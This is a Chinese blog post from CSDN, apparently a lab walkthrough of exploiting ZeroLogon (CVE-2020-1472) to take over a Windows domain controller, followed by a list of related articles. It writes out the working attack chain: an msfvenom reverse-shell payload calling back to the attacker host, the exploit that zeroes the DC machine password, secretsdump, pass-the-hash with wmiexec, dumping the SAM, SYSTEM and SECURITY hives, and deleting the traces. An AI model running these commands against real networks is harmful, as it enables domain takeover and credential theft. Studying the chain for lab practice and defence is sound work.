利用ZeroLogon漏洞接管域控权限

最新推荐文章于 2023-08-10 22:25:05 发布
最新推荐文章于 2023-08-10 22:25:05 发布
阅读量1.5k 收藏 5
点赞数 1
分类专栏: 内网渗透 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/114077855
版权

目录

漏洞介绍

CVE-2020-14722 (又称ZeroLogon)
是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。

实验环境

攻击机 —— Kali 2020
192.168.101.129

域成员 —— win7
192.168.101.134
10.10.10.250

域控 —— winserver 2012
10.10.10.253

实验开始
进入域

首先通过msf生成一个反向shell的马子,拿到域内pc的权限
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.101.129 LPORT=4444 -f exe > /home/zzzwj/tools/msf.exe
在这里插入图片描述
添加10网段的路由
在这里插入图片描述
配置好msf的socket代理模块,在/etc/proxychains.conf文件地下配置好代理的端口
在这里插入图片描述
利用nmap跑一下域控开放的端口
在这里插入图片描述

漏洞验证

POC地址:https://github.com/SecuraBV/CVE-2020-1472,根据链接指示安装支持的第三方库先
python3 cve-2020-1472-poc.py dc [IP]
验证该域控存在该漏洞
在这里插入图片描述

漏洞利用

用secretsdump.py来获取域控中保存的hash,因为现在域控密码还没被置空所以是获取失败的
在这里插入图片描述
kali自带impacket包中的secretsdump.py,在/usr/local/bin路径下
在这里插入图片描述

置空域控密码

注意,这里是域控密码,不是域管的密码。是域控这个机器用户的密码。
EXP地址:https://github.com/VoidSec/CVE-2020-1472
exp利用需要将impacket包更新下:python -m pip install --upgrade impacket

python3 cve-2020-1472-exploit.py -n dc -t 10.10.10.253
在这里插入图片描述

获取新凭据

这里获取的凭据是域管理员密码已被置空后的凭据
python3 secretdump.py -no-pass -just-dc com/dc\$@10.10.10.253
在这里插入图片描述
密码已成功置空
在这里插入图片描述

获取域控半交互式shell

wmiexec.py
获取到hash之后接下来我们就可以利用常见横向工具wmiexec.py进行登录,生成一个半交互式shell(管理员权限)
./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ba0045e98c7e26cc2167f14f3f50bd32 com/Administrator@10.10.10.253
在这里插入图片描述

获取初始凭据(sam)

拿下域控后为了域内账户正常,事后需要恢复域控的密码,所以要从sam中提取初始(置空前)的凭据
tips:注册表解析

HKLM\SAM:包含用户密码的NTLM V2 
HashHKLM\Security:包含缓存的域记录LSA secrets/LSA密钥
HKLM\system-aka SYSKEY:包含可以用于加密LSA sercret和和SAM数据库的密钥

获取到shell后, 利用注册表命令将目标机上的的sam、system、security文件导出
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
在这里插入图片描述
下载导出的文件到本地
get sam.save
get system.save
get security.save
在这里插入图片描述
查看一下导出文件的位置,whereis sam.save
在这里插入图片描述
删除保存在目标机上的文件
del /f sam.save
del /f system.save
del /f security.save
在这里插入图片描述
利用secretsdump.py解析已经下载到在本地的sam文件
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
在这里插入图片描述

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:a3c4ee1111910fe33993af5ef8754e69

初始初hash为:a3c4ee1111910fe33993af5ef8754e69

还原域控密码

利用exp地址中的reinstall_original_pw.py对域控密码进行还原
python3 reinstall_original_pw.py dc 10.10.10.253 a3c4ee1111910fe33993af5ef8754e69
在这里插入图片描述

验证是否还原

python3 secretsdump.py 'com/Administrator:[域管administrator的密码]@10.10.10.253' -just-dc-user 'DC$'
查看dc$账号的hash,已成功还原
在这里插入图片描述
参考链接:
ZeroLogon漏洞分析
https://mp.weixin.qq.com/s/KYxpRfv3El5jXP-HqX-WeA
https://mp.weixin.qq.com/s/JZJj-KtsJ0LyMNNtxrAImA

实践学习学习~
 
GOT IT!

 
******************************************************
具体利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的机器账号密码_Python_下载.zip
04-28
滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的机器账号密码_Python_下载.zip
域渗透04-漏洞CVE-2020-1472)
最新发布
GalaxySpaceX的博客
10-12 373
域渗透04-漏洞CVE-2020-1472)
CVE-2020-1472 NetLogon 权限提升漏洞
梅花寺
08-10 524
Key对其进行AES加密,得到的结果中的第一个字节与8字节的明文input(其实就是Challenge)的第一个字节进行异或运算,将异或的结果放在IV末尾,IV整体向前移一个字节,得到新的IV。(2)重置域控Hash确定目标域控存在NetLogon权限提升,使用CVE-2020-1472.py脚本执行如下命令对其攻击:python3 cve-2020-1472-exploit.py DC 192.168.41.10结果如图所示,该脚本会将目标域控的机器账户的Hash置空,可以看到攻击成功。
内网渗透之横向移动Exchange&ms17-010&域控提权漏洞CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923
m0_62207170的博客
05-01 331
内网渗透之横向移动Exchange&ms17-010&域控提权漏洞CVE-2014-6324&CVE-2020-1472&CVE-2021-42287&CVE-2022-26923
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 8863
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
结合CVE-2019-1040漏洞的两种域提权利用深度分析
systemino的博客
07-03 4025
0x00 漏洞概述 2019年6月,Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞,攻击者可以通过中间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流量中继到目标服务器。PHP大马 通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器,包括域控服务器。 0x01 漏洞利...
域渗透提权入门练习(MS14-068)
ai_64的博客
04-09 538
一、漏洞说明 微软在2014年11月18日发布了一个紧急补丁,修复了一个影响全部版本Windows服务器的严重漏洞。该补丁用于解决Microsoft Windows Kerberos KDC漏洞CVE-2014-6324),该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后,该域...
ATT&CK红队评估(一)拿下域控权限
tangshuangsss的专栏
05-07 489
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介红队实战系列,主要以真实企业环境为实例搭建一系列靶场环境搭建查看:完全模拟ATT&CK实战...
【域渗透提权】CVE-2020-1472 NetLogon 权限提升漏洞
做自己喜欢的事,并将其发挥到极致!
06-23 2200
本篇文章仅用于技术研究和学习,切勿利用文中提及手段非法渗透攻击,造成任何后果与本作者无关,切记!CVE-2020-1472 NetLogon 权限提升漏洞原因是未经身份认证的攻击者可通过使用NetLogon 远程协议(MS-NRPC)连接域控制器来利用漏洞。成功利用漏洞的攻击者可获得域管理员访问权限。Netlogon 是在活动目录中比较重要的一个服务,此服务在 DC 和域成员服务器上运行,为域身份验证提供重要服务。...
zer0dump:滥用CVE-2020-1472(Zerologon)接管域,然后修复本地存储的计算机帐户密码
03-20
Zer0转储Zer0dump是PoC攻击/工具,用于滥用与CVE-2020-1472(Zerologon)相关的漏洞,以启动未打补丁的Windows域控制器的完整系统接管。特别感谢和
subzy:子域接管漏洞检查程序
05-13
潜伏的子域接管工具,该工具基于来自匹配响应安装go get -u -v github.com/lukasikic/subzygo install -v github.com/lukasikic/subzy 如果$GOBIN和$GOPATH ,请执行以下程序:subzy 如果您收到错误的exec format ...
基础漏洞csrf挖掘实战
10-07
这种攻击一般依赖于目标对象之前已经通过了具有漏洞的网站的身份认证,并且攻击者向该网站发起的提交动作和网站的响应不被目标对象感知。当CSRF攻击成功时,我们就可以修改服务器端信息并很有可能完全接管用户的账号。...
spring接管jdbc详解
11-30
spring接管jdbc详解
内网渗透之隐藏隧道技术
Zlirving_的博客
05-07 1715
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
利用mimikatz抓取密码及散列值
Zlirving_的博客
01-15 1451
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范 windows系统散列值获取 域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法) LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐 NTLM HASH:MD4加密。 前提介绍 抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略. 工具: Mimikatz Procd
frp内网穿透工具的使用
Zlirving_的博客
03-11 1325
目录frp工具介绍frp工具原理frp配置文件默认的frps.ini默认的frpc.inifrp下载安装与使用端口转发服务内网穿透服务 FRP官方文档 frp工具介绍 为什么需要内网穿透? 我们的物理机、服务器可能处于路由器后或者处于内网之中。如果我们想直接访问到内网设备的服务,一般来说要通过一些转发或者P2P(端到端)组网软件的帮助。 对于FRP穿透工具来说,它具有端口转发及以外的功能,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,FRP可以进行内网的全流量的数据代理。 frp介绍
ICMP隧道之PingTunnel利用
Zlirving_的博客
02-13 1162
目录ICMP隧道PingTunnel环境配置实验利用查看流量包总结 ICMP隧道 icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。 利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。 PingTunnel 用于通过ICMP回显请求和答复数据包(通常称为ping请求和答复)可靠地建立TCP连接的
端口转发之lcx与portmap结合利用
Zlirving_的博客
02-12 852
目录端口转发端口转发与端口映射的区别工具介绍lcxportmap实验利用总结 端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。 比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑
windows server 2019 双域控
10-01
域控制器是一种提供安全认证服务和记录用户访问权限的服务器。双域控制器的配置可以提高系统的可用性和容错性。 在Windows Server 2019中建立双域控制器需要先安装和配置Active Directory域服务角色。在安装过程中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值